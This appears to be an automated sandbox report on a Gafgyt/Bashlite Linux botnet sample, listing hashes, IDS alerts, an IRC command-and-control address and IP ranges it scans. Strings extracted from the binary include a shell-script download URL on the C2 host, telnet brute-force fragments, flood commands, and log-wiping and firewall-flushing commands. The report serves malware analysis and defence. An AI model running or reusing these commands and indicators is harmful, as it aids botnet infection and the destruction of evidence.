Linux Analysis Report
na.elf

Overview

General Information

Sample name: na.elf
Analysis ID: 1528119
MD5: 99b392663b706132ff5084ebb8efda50
SHA1: d8ebf610367735a7fbe7178dfa45c93d47bf3ad4
SHA256: 1a532d07e86c2f6c57bebe91797859088241391573d1863e52913bec109876c0
Tags: elfuser-abuse_ch
Infos:

Detection

Gafgyt
Score: 88
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gafgyt
Opens /proc/net/* files useful for finding connected devices and routers
Uses IRC for communication with a C&C
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of network range scanning capabilities
Sample contains strings that are user agent strings indicative of HTTP manipulation
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Name Description Attribution Blogpost URLs Link
Bashlite, Gafgyt Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite

AV Detection

barindex
Source: na.elf Avira: detected
Source: na.elf Malware Configuration Extractor: Gafgyt {"C2 url": "192.227.146.254:6667"}
Source: na.elf ReversingLabs: Detection: 63%

Spreading

barindex
Source: /tmp/na.elf (PID: 5519) Opens: /proc/net/route Jump to behavior
Source: Initial sample String containing an IP format string found: 112.5.%d.%d
Source: Initial sample String containing an IP format string found: 117.165.%d.%d
Source: Initial sample String containing an IP format string found: 85.3.%d.%d
Source: Initial sample String containing an IP format string found: 41.252.%d.%d
Source: Initial sample String containing an IP format string found: 104.55.%d.%d
Source: Initial sample String containing an IP format string found: 78.186.%d.%d
Source: Initial sample String containing an IP format string found: 78.189.%d.%d
Source: Initial sample String containing an IP format string found: 221.120.%d.%d
Source: Initial sample String containing an IP format string found: 88.5.%d.%d
Source: Initial sample String containing an IP format string found: 41.254.%d.%d
Source: Initial sample String containing an IP format string found: 103.20.%d.%d
Source: Initial sample String containing an IP format string found: 103.47.%d.%d
Source: Initial sample String containing an IP format string found: 103.57.%d.%d
Source: Initial sample String containing an IP format string found: 45.117.%d.%d
Source: Initial sample String containing an IP format string found: 101.51.%d.%d
Source: Initial sample String containing an IP format string found: 137.59.%d.%d
Source: Initial sample String containing an IP format string found: 14.204.%d.%d
Source: Initial sample String containing an IP format string found: 27.50.%d.%d
Source: Initial sample String containing an IP format string found: 27.54.%d.%d
Source: Initial sample String containing an IP format string found: 27.98.%d.%d
Source: Initial sample String containing an IP format string found: 36.32.%d.%d
Source: Initial sample String containing an IP format string found: 36.248.%d.%d
Source: Initial sample String containing an IP format string found: 39.64.%d.%d
Source: Initial sample String containing an IP format string found: 43.253.%d.%d
Source: Initial sample String containing an IP format string found: 43.230.%d.%d
Source: Initial sample String containing an IP format string found: 163.53.%d.%d
Source: Initial sample String containing an IP format string found: 43.245.%d.%d
Source: Initial sample String containing an IP format string found: 123.25.%d.%d
Source: Initial sample String containing an IP format string found: 103.54.%d.%d
Source: Initial sample String containing an IP format string found: 27.255.%d.%d
Source: Initial sample String containing an IP format string found: 103.204.%d.%d
Source: Initial sample String containing an IP format string found: 123.24.%d.%d
Source: Initial sample String containing an IP format string found: 113.191.%d.%d
Source: Initial sample String containing an IP format string found: 113.188.%d.%d
Source: Initial sample String containing an IP format string found: 113.189.%d.%d
Source: Initial sample String containing an IP format string found: 14.160.%d.%d
Source: Initial sample String containing an IP format string found: 14.161.%d.%d
Source: Initial sample String containing an IP format string found: 14.162.%d.%d
Source: Initial sample String containing an IP format string found: 14.163.%d.%d
Source: Initial sample String containing an IP format string found: 14.164.%d.%d
Source: Initial sample String containing an IP format string found: 14.165.%d.%d
Source: Initial sample String containing an IP format string found: 14.166.%d.%d
Source: Initial sample String containing an IP format string found: 14.167.%d.%d
Source: Initial sample String containing an IP format string found: 14.168.%d.%d
Source: Initial sample String containing an IP format string found: 14.169.%d.%d
Source: Initial sample String containing an IP format string found: 14.170.%d.%d
Source: Initial sample String containing an IP format string found: 14.171.%d.%d
Source: Initial sample String containing an IP format string found: 14.172.%d.%d
Source: Initial sample String containing an IP format string found: 14.173.%d.%d
Source: Initial sample String containing an IP format string found: 14.174.%d.%d
Source: Initial sample String containing an IP format string found: 14.175.%d.%d
Source: Initial sample String containing an IP format string found: 14.176.%d.%d
Source: Initial sample String containing an IP format string found: 14.177.%d.%d
Source: Initial sample String containing an IP format string found: 14.178.%d.%d
Source: Initial sample String containing an IP format string found: 14.179.%d.%d
Source: Initial sample String containing an IP format string found: 14.180.%d.%d
Source: Initial sample String containing an IP format string found: 14.181.%d.%d
Source: Initial sample String containing an IP format string found: 14.182.%d.%d
Source: Initial sample String containing an IP format string found: 14.183.%d.%d
Source: Initial sample String containing an IP format string found: 14.184.%d.%d
Source: Initial sample String containing an IP format string found: 14.185.%d.%d
Source: Initial sample String containing an IP format string found: 14.186.%d.%d
Source: Initial sample String containing an IP format string found: 14.187.%d.%d
Source: Initial sample String containing an IP format string found: 14.188.%d.%d
Source: Initial sample String containing an IP format string found: 14.189.%d.%d
Source: Initial sample String containing an IP format string found: 14.190.%d.%d
Source: Initial sample String containing an IP format string found: 14.191.%d.%d
Source: Initial sample String containing an IP format string found: 45.121.%d.%d
Source: Initial sample String containing an IP format string found: 45.120.%d.%d
Source: Initial sample String containing an IP format string found: 45.115.%d.%d
Source: Initial sample String containing an IP format string found: 43.252.%d.%d
Source: Initial sample String containing an IP format string found: 43.240.%d.%d
Source: Initial sample String containing an IP format string found: 41.174.%d.%d
Source: Initial sample String containing an IP format string found: 45.127.%d.%d
Source: Initial sample String containing an IP format string found: 103.30.%d.%d
Source: Initial sample String containing an IP format string found: 123.16.%d.%d
Source: Initial sample String containing an IP format string found: 202.44.%d.%d
Source: Initial sample String containing an IP format string found: 116.93.%d.%d
Source: Initial sample String containing an IP format string found: 41.253.%d.%d
Source: Initial sample String containing an IP format string found: 117.173.%d.%d
Source: Initial sample String containing an IP format string found: 113.190.%d.%d
Source: Initial sample String containing an IP format string found: 112.196.%d.%d
Source: Initial sample String containing an IP format string found: 113.178.%d.%d
Source: Initial sample String containing an IP format string found: 112.45.%d.%d
Source: Initial sample String containing an IP format string found: 183.223.%d.%d
Source: Initial sample String containing an IP format string found: 116.71.%d.%d
Source: Initial sample String containing an IP format string found: 103.44.%d.%d
Source: Initial sample String containing an IP format string found: 110.235.%d.%d
Source: Initial sample String containing an IP format string found: 124.253.%d.%d
Source: Initial sample String containing an IP format string found: 211.237.%d.%d
Source: Initial sample String containing an IP format string found: 117.175.%d.%d
Source: Initial sample String containing an IP format string found: 111.9.%d.%d
Source: Initial sample String containing an IP format string found: 222.252.%d.%d
Source: Initial sample String containing an IP format string found: 113.174.%d.%d
Source: Initial sample String containing an IP format string found: 113.160.%d.%d
Source: Initial sample String containing an IP format string found: 113.161.%d.%d
Source: Initial sample String containing an IP format string found: 113.162.%d.%d
Source: Initial sample String containing an IP format string found: 113.163.%d.%d
Source: Initial sample String containing an IP format string found: 113.164.%d.%d
Source: Initial sample String containing an IP format string found: 113.165.%d.%d

Networking

barindex
Source: Network traffic Suricata IDS: 2836862 - Severity 1 - ETPRO MALWARE ELF/HITTA Bot CnC Checkin : 192.168.2.15:37988 -> 192.227.146.254:6667
Source: Network traffic Suricata IDS: 2842256 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Checkin : 192.168.2.15:37988 -> 192.227.146.254:6667
Source: Network traffic Suricata IDS: 2836863 - Severity 1 - ETPRO MALWARE ELF/HITTA Bot Infection Status Inbound : 192.227.146.254:6667 -> 192.168.2.15:37988
Source: unknown IRC traffic detected: 192.168.2.15:37988 -> 192.227.146.254:6667 [0;32m[CONNECTED] [HITTA] [192.168.2.15]
Source: Initial sample String containing an IP format string found: 112.5.%d.%d
Source: Initial sample String containing an IP format string found: 117.165.%d.%d
Source: Initial sample String containing an IP format string found: 85.3.%d.%d
Source: Initial sample String containing an IP format string found: 41.252.%d.%d
Source: Initial sample String containing an IP format string found: 104.55.%d.%d
Source: Initial sample String containing an IP format string found: 78.186.%d.%d
Source: Initial sample String containing an IP format string found: 78.189.%d.%d
Source: Initial sample String containing an IP format string found: 221.120.%d.%d
Source: Initial sample String containing an IP format string found: 88.5.%d.%d
Source: Initial sample String containing an IP format string found: 41.254.%d.%d
Source: Initial sample String containing an IP format string found: 103.20.%d.%d
Source: Initial sample String containing an IP format string found: 103.47.%d.%d
Source: Initial sample String containing an IP format string found: 103.57.%d.%d
Source: Initial sample String containing an IP format string found: 45.117.%d.%d
Source: Initial sample String containing an IP format string found: 101.51.%d.%d
Source: Initial sample String containing an IP format string found: 137.59.%d.%d
Source: Initial sample String containing an IP format string found: 14.204.%d.%d
Source: Initial sample String containing an IP format string found: 27.50.%d.%d
Source: Initial sample String containing an IP format string found: 27.54.%d.%d
Source: Initial sample String containing an IP format string found: 27.98.%d.%d
Source: Initial sample String containing an IP format string found: 36.32.%d.%d
Source: Initial sample String containing an IP format string found: 36.248.%d.%d
Source: Initial sample String containing an IP format string found: 39.64.%d.%d
Source: Initial sample String containing an IP format string found: 43.253.%d.%d
Source: Initial sample String containing an IP format string found: 43.230.%d.%d
Source: Initial sample String containing an IP format string found: 163.53.%d.%d
Source: Initial sample String containing an IP format string found: 43.245.%d.%d
Source: Initial sample String containing an IP format string found: 123.25.%d.%d
Source: Initial sample String containing an IP format string found: 103.54.%d.%d
Source: Initial sample String containing an IP format string found: 27.255.%d.%d
Source: Initial sample String containing an IP format string found: 103.204.%d.%d
Source: Initial sample String containing an IP format string found: 123.24.%d.%d
Source: Initial sample String containing an IP format string found: 113.191.%d.%d
Source: Initial sample String containing an IP format string found: 113.188.%d.%d
Source: Initial sample String containing an IP format string found: 113.189.%d.%d
Source: Initial sample String containing an IP format string found: 14.160.%d.%d
Source: Initial sample String containing an IP format string found: 14.161.%d.%d
Source: Initial sample String containing an IP format string found: 14.162.%d.%d
Source: Initial sample String containing an IP format string found: 14.163.%d.%d
Source: Initial sample String containing an IP format string found: 14.164.%d.%d
Source: Initial sample String containing an IP format string found: 14.165.%d.%d
Source: Initial sample String containing an IP format string found: 14.166.%d.%d
Source: Initial sample String containing an IP format string found: 14.167.%d.%d
Source: Initial sample String containing an IP format string found: 14.168.%d.%d
Source: Initial sample String containing an IP format string found: 14.169.%d.%d
Source: Initial sample String containing an IP format string found: 14.170.%d.%d
Source: Initial sample String containing an IP format string found: 14.171.%d.%d
Source: Initial sample String containing an IP format string found: 14.172.%d.%d
Source: Initial sample String containing an IP format string found: 14.173.%d.%d
Source: Initial sample String containing an IP format string found: 14.174.%d.%d
Source: Initial sample String containing an IP format string found: 14.175.%d.%d
Source: Initial sample String containing an IP format string found: 14.176.%d.%d
Source: Initial sample String containing an IP format string found: 14.177.%d.%d
Source: Initial sample String containing an IP format string found: 14.178.%d.%d
Source: Initial sample String containing an IP format string found: 14.179.%d.%d
Source: Initial sample String containing an IP format string found: 14.180.%d.%d
Source: Initial sample String containing an IP format string found: 14.181.%d.%d
Source: Initial sample String containing an IP format string found: 14.182.%d.%d
Source: Initial sample String containing an IP format string found: 14.183.%d.%d
Source: Initial sample String containing an IP format string found: 14.184.%d.%d
Source: Initial sample String containing an IP format string found: 14.185.%d.%d
Source: Initial sample String containing an IP format string found: 14.186.%d.%d
Source: Initial sample String containing an IP format string found: 14.187.%d.%d
Source: Initial sample String containing an IP format string found: 14.188.%d.%d
Source: Initial sample String containing an IP format string found: 14.189.%d.%d
Source: Initial sample String containing an IP format string found: 14.190.%d.%d
Source: Initial sample String containing an IP format string found: 14.191.%d.%d
Source: Initial sample String containing an IP format string found: 45.121.%d.%d
Source: Initial sample String containing an IP format string found: 45.120.%d.%d
Source: Initial sample String containing an IP format string found: 45.115.%d.%d
Source: Initial sample String containing an IP format string found: 43.252.%d.%d
Source: Initial sample String containing an IP format string found: 43.240.%d.%d
Source: Initial sample String containing an IP format string found: 41.174.%d.%d
Source: Initial sample String containing an IP format string found: 45.127.%d.%d
Source: Initial sample String containing an IP format string found: 103.30.%d.%d
Source: Initial sample String containing an IP format string found: 123.16.%d.%d
Source: Initial sample String containing an IP format string found: 202.44.%d.%d
Source: Initial sample String containing an IP format string found: 116.93.%d.%d
Source: Initial sample String containing an IP format string found: 41.253.%d.%d
Source: Initial sample String containing an IP format string found: 117.173.%d.%d
Source: Initial sample String containing an IP format string found: 113.190.%d.%d
Source: Initial sample String containing an IP format string found: 112.196.%d.%d
Source: Initial sample String containing an IP format string found: 113.178.%d.%d
Source: Initial sample String containing an IP format string found: 112.45.%d.%d
Source: Initial sample String containing an IP format string found: 183.223.%d.%d
Source: Initial sample String containing an IP format string found: 116.71.%d.%d
Source: Initial sample String containing an IP format string found: 103.44.%d.%d
Source: Initial sample String containing an IP format string found: 110.235.%d.%d
Source: Initial sample String containing an IP format string found: 124.253.%d.%d
Source: Initial sample String containing an IP format string found: 211.237.%d.%d
Source: Initial sample String containing an IP format string found: 117.175.%d.%d
Source: Initial sample String containing an IP format string found: 111.9.%d.%d
Source: Initial sample String containing an IP format string found: 222.252.%d.%d
Source: Initial sample String containing an IP format string found: 113.174.%d.%d
Source: Initial sample String containing an IP format string found: 113.160.%d.%d
Source: Initial sample String containing an IP format string found: 113.161.%d.%d
Source: Initial sample String containing an IP format string found: 113.162.%d.%d
Source: Initial sample String containing an IP format string found: 113.163.%d.%d
Source: Initial sample String containing an IP format string found: 113.164.%d.%d
Source: Initial sample String containing an IP format string found: 113.165.%d.%d
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.146.254
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.146.254
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.146.254
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.146.254
Source: unknown TCP traffic detected without corresponding DNS query: 43.230.36.24
Source: unknown TCP traffic detected without corresponding DNS query: 103.255.113.114
Source: unknown TCP traffic detected without corresponding DNS query: 103.20.97.163
Source: unknown TCP traffic detected without corresponding DNS query: 222.252.205.59
Source: unknown TCP traffic detected without corresponding DNS query: 14.186.107.143
Source: unknown TCP traffic detected without corresponding DNS query: 14.180.172.72
Source: unknown TCP traffic detected without corresponding DNS query: 43.230.36.24
Source: unknown TCP traffic detected without corresponding DNS query: 183.223.106.10
Source: unknown TCP traffic detected without corresponding DNS query: 103.255.113.114
Source: unknown TCP traffic detected without corresponding DNS query: 14.173.171.32
Source: unknown TCP traffic detected without corresponding DNS query: 103.30.157.102
Source: unknown TCP traffic detected without corresponding DNS query: 103.20.97.163
Source: unknown TCP traffic detected without corresponding DNS query: 222.252.205.59
Source: unknown TCP traffic detected without corresponding DNS query: 103.225.7.248
Source: unknown TCP traffic detected without corresponding DNS query: 88.105.47.29
Source: unknown TCP traffic detected without corresponding DNS query: 14.186.107.143
Source: unknown TCP traffic detected without corresponding DNS query: 117.173.9.232
Source: unknown TCP traffic detected without corresponding DNS query: 14.180.172.72
Source: unknown TCP traffic detected without corresponding DNS query: 183.223.106.10
Source: unknown TCP traffic detected without corresponding DNS query: 36.32.243.193
Source: unknown TCP traffic detected without corresponding DNS query: 14.173.171.32
Source: unknown TCP traffic detected without corresponding DNS query: 162.12.82.156
Source: unknown TCP traffic detected without corresponding DNS query: 103.30.157.102
Source: unknown TCP traffic detected without corresponding DNS query: 123.21.26.55
Source: unknown TCP traffic detected without corresponding DNS query: 103.225.7.248
Source: unknown TCP traffic detected without corresponding DNS query: 137.59.199.146
Source: unknown TCP traffic detected without corresponding DNS query: 88.105.47.29
Source: unknown TCP traffic detected without corresponding DNS query: 43.228.72.151
Source: unknown TCP traffic detected without corresponding DNS query: 117.173.9.232
Source: unknown TCP traffic detected without corresponding DNS query: 14.183.185.41
Source: unknown TCP traffic detected without corresponding DNS query: 103.195.91.185
Source: unknown TCP traffic detected without corresponding DNS query: 36.32.243.193
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.219.92
Source: unknown TCP traffic detected without corresponding DNS query: 162.12.82.156
Source: unknown TCP traffic detected without corresponding DNS query: 211.237.237.182
Source: unknown TCP traffic detected without corresponding DNS query: 123.21.26.55
Source: unknown TCP traffic detected without corresponding DNS query: 123.17.46.71
Source: unknown TCP traffic detected without corresponding DNS query: 137.59.199.146
Source: unknown TCP traffic detected without corresponding DNS query: 137.59.252.124
Source: unknown TCP traffic detected without corresponding DNS query: 43.228.72.151
Source: unknown TCP traffic detected without corresponding DNS query: 14.186.233.238
Source: unknown TCP traffic detected without corresponding DNS query: 14.183.185.41
Source: unknown TCP traffic detected without corresponding DNS query: 104.55.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 103.195.91.185
Source: unknown TCP traffic detected without corresponding DNS query: 41.252.40.148
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.219.92
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: na.elf String found in binary or memory: http://192.227.146.254/deltahaxsyeaok.sh;
Source: na.elf String found in binary or memory: http://code.google.com/appengine;
Source: na.elf String found in binary or memory: http://majestic12.co.uk/bot.php?
Source: na.elf String found in binary or memory: http://wortschatz.uni-leipzig.de/findlinks/)
Source: na.elf String found in binary or memory: http://wortschatz.uni-leipzig.de/findlinks/)Mozilla/5.0
Source: na.elf String found in binary or memory: http://wortschatz.uni-leipzig.de/findlinks/)findlinks/1.1.5-beta7
Source: na.elf String found in binary or memory: http://wortschatz.uni-leipzig.de/findlinks/)findlinks/1.1.6-beta1
Source: na.elf String found in binary or memory: http://wortschatz.uni-leipzig.de/findlinks/)findlinks/1.1.6-beta4
Source: na.elf String found in binary or memory: http://wortschatz.uni-leipzig.de/findlinks/)findlinks/1.1.6-beta6
Source: na.elf String found in binary or memory: http://www.brandwatch.net)
Source: na.elf String found in binary or memory: http://www.brandwatch.net)Mozilla/5.0
Source: na.elf String found in binary or memory: http://www.majestic12.co.uk/bot.php?
Source: na.elf String found in binary or memory: http://www.mojeek.com/bot.html)
Source: na.elf ELF static info symbol of initial sample: PhoneScan
Source: na.elf ELF static info symbol of initial sample: PhoneScanner
Source: na.elf ELF static info symbol of initial sample: Phonepid
Source: na.elf ELF static info symbol of initial sample: passwords
Source: na.elf ELF static info symbol of initial sample: phone
Source: na.elf ELF static info symbol of initial sample: phonepayload
Source: na.elf ELF static info symbol of initial sample: usernames
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: telnet:oginsernameasswordLinux9615-cdpnvalidailedncorrecteniedrroroodbyebadbusybox$#Device Repped/dev/netslink//tmp//var//dev//var/run//dev/shm//mnt//boot//usr//opt/192.227.146.254:6667/usr/dict/wordsr(null)buf: %s
Source: Initial sample String containing 'busybox' found: busybox*
Source: Initial sample String containing 'busybox' found: tFailed opening raw socket.Failed setting raw headers mode.all,synrstfinackpshInvalid flag "%s"jackmy*busybox*bin*sex*tftp*arm*mipsel*mips*mips64*i686*sparc*sh4*bot*jackmeoff*hackz*bruv*momentum*hakai*yowai*katana*a-r-m*a-r-m-4*a-r-m-7*m-i-p-s*Sakura*
Source: Initial sample String containing 'busybox' found: pkill -9 busybox
Source: Initial sample String containing 'busybox' found: rm -rf /tmp/* /var/* /var/run/* /var/tmp/*rm -rf /var/log/wtmphistory -c;history -wrm -rf /tmp/*history -crm -rf ~/.bash_historyrm -rf /bin/netstathistory -wpkill -9 busyboxpkill -9 perlservice iptables stop/sbin/iptables -F;/sbin/iptables -XPONG!GETLOCALIPMy IP: %sBOTKILL[BOTKILLER] [STARTED] [%s]SCANNEROFFONUDPHTTPHTTP %s Flooding %s:%d for %d secondsPHONESTDTCPKILLATTKLOLNOGTFO8.8.8.8/proc/net/route00000000HITTA[CONNECTED] [%s] [%s]
Source: classification engine Classification label: mal88.spre.troj.linELF@0/1@2/0
Source: na.elf ELF static info symbol of initial sample: libc/sysdeps/linux/powerpc/brk.S
Source: na.elf ELF static info symbol of initial sample: libc/sysdeps/linux/powerpc/crt1.S
Source: na.elf ELF static info symbol of initial sample: libc/sysdeps/linux/powerpc/crti.S
Source: na.elf ELF static info symbol of initial sample: libc/sysdeps/linux/powerpc/crtn.S
Source: na.elf ELF static info symbol of initial sample: libc/sysdeps/linux/powerpc/vfork.S
Source: /tmp/na.elf (PID: 5519) Queries kernel information via 'uname': Jump to behavior
Source: na.elf, 5519.1.00005594f51ae000.00005594f525e000.rw-.sdmp, na.elf, 5521.1.00005594f51ae000.00005594f525e000.rw-.sdmp Binary or memory string: !/etc/qemu-binfmt/ppc11!hotpluggableq
Source: na.elf, 5519.1.00005594f51ae000.00005594f525e000.rw-.sdmp, na.elf, 5521.1.00005594f51ae000.00005594f525e000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/ppc
Source: na.elf, 5519.1.00007ffd4dca2000.00007ffd4dcc3000.rw-.sdmp Binary or memory string: U/tmp/qemu-open.DZaULx\
Source: na.elf, 5519.1.00007ffd4dca2000.00007ffd4dcc3000.rw-.sdmp, na.elf, 5521.1.00007ffd4dca2000.00007ffd4dcc3000.rw-.sdmp Binary or memory string: /usr/bin/qemu-ppc
Source: na.elf, 5519.1.00007ffd4dca2000.00007ffd4dcc3000.rw-.sdmp, na.elf, 5521.1.00007ffd4dca2000.00007ffd4dcc3000.rw-.sdmp Binary or memory string: +x86_64/usr/bin/qemu-ppc/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf
Source: na.elf, 5519.1.00007ffd4dca2000.00007ffd4dcc3000.rw-.sdmp Binary or memory string: /tmp/qemu-open.DZaULx

Stealing of Sensitive Information

barindex
Source: Yara match File source: na.elf, type: SAMPLE
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
Source: Initial sample User agent string found: Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Source: Initial sample User agent string found: Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Source: Initial sample User agent string found: Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Source: Initial sample User agent string found: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2

Remote Access Functionality

barindex
Source: Yara match File source: na.elf, type: SAMPLE
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs